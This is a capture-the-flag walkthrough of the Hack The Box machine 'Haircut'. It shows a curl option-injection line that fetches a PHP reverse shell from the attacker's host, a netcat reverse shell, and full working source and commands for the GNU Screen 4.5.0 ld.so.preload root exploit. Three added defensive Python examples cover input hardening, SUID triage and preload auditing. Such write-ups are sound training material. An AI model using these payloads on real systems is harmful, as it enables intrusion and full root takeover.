As always, we start with Nmap:

```
root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-27 14:04 CET
Nmap scan report for 10.10.10.24
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.52 seconds
```
A bit of DirBuster.

We can see the uploads folder and a place to inject commands:

```
10.10.14.26:8000/php-reverse-shell.php -o uploads/reverse.php
```

Going to http://10.10.10.24/uploads/reverse.php

and using the reverse TCP shell that ships with Kali, you get a reverse shell:
```
root@Kali2:~/Desktop# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.24] 51748
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 15:16:02 up  1:17,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ^[[D^[[A^[[C^[[B
/bin/sh: 1: : not found
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@haircut:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@Kali2:~/Desktop# stty raw -echo
root@Kali2:~/Desktop# nc -lvnp 1234

www-data@haircut:/$ ls
```
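The foothold above works because the upload form passes a user-controlled URL to curl as part of a shell string, so a trailing `-o uploads/reverse.php` is read as a curl option. The following is an added example (not code from the box or from this writeup; `build_curl_argv`, `fetch`, the scheme allow-list and the sample inputs are the editor's own constructions) showing the hardened form: the URL must be a single token, must parse with an allowed scheme and a host, is passed after `--` so curl can never treat it as an option, and the output path is chosen by the server.

```python
"""Hardening the pattern behind the foothold above: a web handler that hands a
user-controlled URL to curl. Added example, not code from the box or the
writeup; build_curl_argv/fetch and the sample inputs are the editor's own."""
import subprocess
from urllib.parse import urlsplit

# Schemes a downloader may fetch (assumption: a real allow-list would also
# pin hosts and be loaded from configuration rather than hard-coded).
ALLOWED_SCHEMES = {"http", "https"}


def build_curl_argv(user_url: str, out_dir: str = "/var/www/uploads") -> list:
    """Return the argv list for a constrained curl run, or raise ValueError.

    The weak form is a shell string such as  os.system("curl " + user_url):
    an input like  http://h/x.php -o uploads/r.php  then supplies its own
    option.  Here the URL must be one token, must parse with an allowed
    scheme and a host, and is placed after "--" so curl can never read it
    as an option.  The output file name is fixed by the server, not the user.
    """
    if not user_url or any(ch.isspace() for ch in user_url):
        raise ValueError("URL must be one token with no whitespace")
    if user_url.startswith("-"):
        raise ValueError("URL must not start with '-'")
    parts = urlsplit(user_url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    if not parts.hostname:
        raise ValueError("URL has no host")
    out_path = out_dir.rstrip("/") + "/download.bin"
    return [
        "curl", "--silent", "--fail",
        "--max-filesize", "1048576",     # cap the download at 1 MiB
        "--output", out_path,            # server-chosen destination
        "--", user_url,                  # everything after "--" is a URL
    ]


def fetch(user_url: str) -> int:
    """Run curl with the hardened argv (no shell); return its exit status."""
    return subprocess.run(build_curl_argv(user_url), check=False).returncode
```

With this in place the payload shown above is rejected before curl ever runs, both because it contains whitespace and because it has no allowed scheme; the argv list form also removes the shell from the picture entirely, so no quoting trick can reintroduce an option.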
With LinEnum we have:

```
[-] SUID files:
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 May 4 2017 /bin/su
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 May 4 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 39904 May 4 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 32944 May 4 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 May 4 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
-rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root 40432 May 4 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 49584 May 4 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 208680 Apr 29 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
```
The most interesting (and odd) one is:

```
root@Kali2:~/Desktop# searchsploit screen 4.5
---------------------------------------------------- ----------------------------------------
 Exploit Title                                      |  Path
                                                    | (/usr/share/exploitdb/)
---------------------------------------------------- ----------------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation       | exploits/linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | exploits/linux/local/41152.txt
---------------------------------------------------- ----------------------------------------
Shellcodes: No Result
```
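What makes `screen-4.5.0` stand out in that list is that it is setuid root but is not a packaged binary: it carries a version suffix in its name and does not belong to the stock set of setuid programs. The following is an added example (not part of the writeup or of LinEnum) that turns that eyeball check into a triage script: it parses `ls -l` style lines such as the ones above and flags setuid-root entries that are outside a baseline or have a versioned name. `BASELINE` is an assumption standing in for package metadata, and `SAMPLE_LINES` are constructed from the listing on this page.

```python
"""Triage of a SUID listing like the LinEnum output above: flag setuid-root
binaries that are not in a known baseline or carry a version suffix in their
name, which on this box is what gave screen-4.5.0 away.  Added example, not
part of the writeup or of LinEnum; BASELINE is an assumption and SAMPLE_LINES
are constructed from the listing on this page."""
import re
from typing import Dict, List, Optional

# setuid-root binaries expected on a stock Ubuntu 16.04 host (assumption: a
# real baseline should come from package metadata or a golden image).
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/bin/fusermount", "/bin/ntfs-3g",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/newuidmap",
    "/usr/bin/newgidmap", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/snapd/snap-confine",
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic",
}

# One `ls -l` style line: mode, links, owner, group, size, month, day, year/time, path
LS_LINE = re.compile(
    r"^(?P<mode>[-dlrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+[A-Za-z]{3}\s+\d{1,2}\s+\S+\s+(?P<path>/\S+)$"
)
# A trailing "-4.5.0" style suffix: typical of a hand-built, unpackaged binary
VERSIONED = re.compile(r"-\d+(\.\d+)+$")

# Constructed sample taken from the listing above
SAMPLE_LINES = [
    "-rwsr-xr-x 1 root root 40128 May 4 2017 /bin/su",
    "-rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd",
    "-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at",
    "-rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0",
]


def parse_ls_line(line: str) -> Optional[Dict[str, str]]:
    """Split one listing line into its fields, or None if it is not one."""
    m = LS_LINE.match(line.strip())
    return m.groupdict() if m else None


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Return {"path", "reasons"} for every suspicious setuid-root entry."""
    findings = []
    for line in lines:
        entry = parse_ls_line(line)
        if entry is None:
            continue
        setuid = entry["mode"][3] in "sS"   # owner-execute slot shows the setuid bit
        if not (setuid and entry["owner"] == "root"):
            continue
        reasons = []
        if entry["path"] not in BASELINE:
            reasons.append("not-in-baseline")
        if VERSIONED.search(entry["path"]):
            reasons.append("versioned-name")
        if reasons:
            findings.append({"path": entry["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f["path"], ", ".join(f["reasons"]))
```

On the sample lines only `/usr/bin/screen-4.5.0` is reported, for both reasons; feeding it the whole LinEnum block gives the same single hit, which is the quickest way to confirm that nothing else in the list is out of place.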
Understanding the exploit is moderately easy (and that was the point of this machine).

Since the exploit doesn't work as-is, we'll have to do it by hand, starting by compiling (following the instructions in the exploit) from our Kali:

```
root@Kali2:~/Desktop# cat << EOF > /tmp/libhax.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <unistd.h>
> __attribute__ ((__constructor__))
> void dropshell(void){
>     chown("/tmp/rootshell", 0, 0);
>     chmod("/tmp/rootshell", 04755);
>     unlink("/etc/ld.so.preload");
>     printf("[+] done!\n");
> }
> EOF
root@Kali2:~/Desktop# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
/tmp/libhax.c: In function ‘dropshell’:
/tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
root@Kali2:~/Desktop# cat << EOF > /tmp/rootshell.c
> #include <stdio.h>
> int main(void){
>     setuid(0);
>     setgid(0);
>     seteuid(0);
>     setegid(0);
>     execvp("/bin/sh", NULL, NULL);
> }
> EOF
root@Kali2:~/Desktop# gcc -o /tmp/rootshell /tmp/rootshell.c
/tmp/rootshell.c: In function ‘main’:
/tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
/tmp/rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
root@Kali2:~/Desktop# cd /tmp/
root@Kali2:/tmp# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.24 - - [27/Oct/2019 15:31:54] "GET /rootshell HTTP/1.1" 200 -
10.10.10.24 - - [27/Oct/2019 15:32:02] "GET /libhax.so HTTP/1.1" 200 -
```
Now from Haircut:

```
www-data@haircut:/dev/shm$ cd /tmp/
www-data@haircut:/tmp$ wget 10.10.14.26:8000/rootshell
--2019-10-27 15:31:54--  http://10.10.14.26:8000/rootshell
Connecting to 10.10.14.26:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[===================>]  16.44K  --.-KB/s    in 0.02s

2019-10-27 15:31:54 (858 KB/s) - 'rootshell' saved [16832/16832]

www-data@haircut:/tmp$ wget 10.10.14.26:8000/libhax.so
--2019-10-27 15:32:02--  http://10.10.14.26:8000/libhax.so
Connecting to 10.10.14.26:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[===================>]  15.77K  --.-KB/s    in 0.02s

2019-10-27 15:32:02 (718 KB/s) - 'libhax.so' saved [16144/16144]

cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
screen -ls # screen itself is setuid, so...
/tmp/rootshell
www-data@haircut:/etc$ /tmp/rootshell
# whoami
root
# cat user.txt
0b0da2af50e9ab...
# cat root.txt
4cfa26d84b22208...
```
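The whole escalation rests on two observable facts about `/etc/ld.so.preload`: it ends up containing a library path under `/tmp`, and, because of the `umask 000` that the setuid screen inherits when it creates the log file, the file is world-writable and was not written by the package manager. The following is an added example (not part of the writeup or of the exploit) of a defender-side audit that checks both: it parses the preload file the way ld.so does (as a whitespace-separated list, per the ld.so manual), flags entries under user-writable directories, and checks the file's owner and mode. `SAMPLE_PRELOAD` is constructed to mirror what the exploit writes, and `UNTRUSTED_DIRS` is an assumption.

```python
"""Audit /etc/ld.so.preload for the tampering pattern used above: a library
path appended by a setuid program that writes with a permissive umask.  Added
example, not part of the writeup or of the exploit; SAMPLE_PRELOAD is
constructed and UNTRUSTED_DIRS is an assumption."""
import os
import stat
from typing import Dict, List, Tuple

# Directories any local user can write to: a preload entry here means a
# non-root user controls code loaded into every new process, root's included.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Constructed content mirroring what the exploit above writes: a leading
# newline (so screen's own log output cannot corrupt the entry), then the path.
SAMPLE_PRELOAD = "\n/tmp/libhax.so\n"


def classify_entries(text: str) -> List[Tuple[str, str]]:
    """Return (entry, verdict) for each whitespace-separated preload entry.

    ld.so reads the file as a whitespace-separated list, so the unit is the
    token, not the line (assumption based on the ld.so manual page).
    """
    verdicts = []
    for token in text.split():
        if not token.startswith("/"):
            verdicts.append((token, "relative-path"))
        elif token.startswith(UNTRUSTED_DIRS):
            verdicts.append((token, "untrusted-dir"))
        else:
            verdicts.append((token, "ok"))
    return verdicts


def mode_problems(uid: int, mode: int) -> List[str]:
    """Problems with the file's own metadata.  With umask 000 the file that
    screen creates ends up 0666, which is exactly what this catches."""
    problems = []
    if uid != 0:
        problems.append("not-owned-by-root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("group-or-world-writable")
    return problems


def audit_preload(path: str = "/etc/ld.so.preload") -> Dict[str, object]:
    """Stat and read the preload file; an absent file is the normal state."""
    report: Dict[str, object] = {"exists": False, "problems": [], "entries": []}
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return report
    report["exists"] = True
    report["problems"] = mode_problems(st.st_uid, st.st_mode)
    with open(path, "r", errors="replace") as fh:
        report["entries"] = classify_entries(fh.read())
    return report


if __name__ == "__main__":
    print(audit_preload())
```

Run as root on a host this reports `exists: False` in the common case; any `untrusted-dir` entry, or a preload file that is group- or world-writable, is worth an immediate look, since the library named there is loaded into every dynamically linked process that starts afterwards. The same two checks are cheap to schedule from cron or to fold into an existing integrity-monitoring baseline.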
And since we didn't have this machine yet, we've now added it to HTB 🙂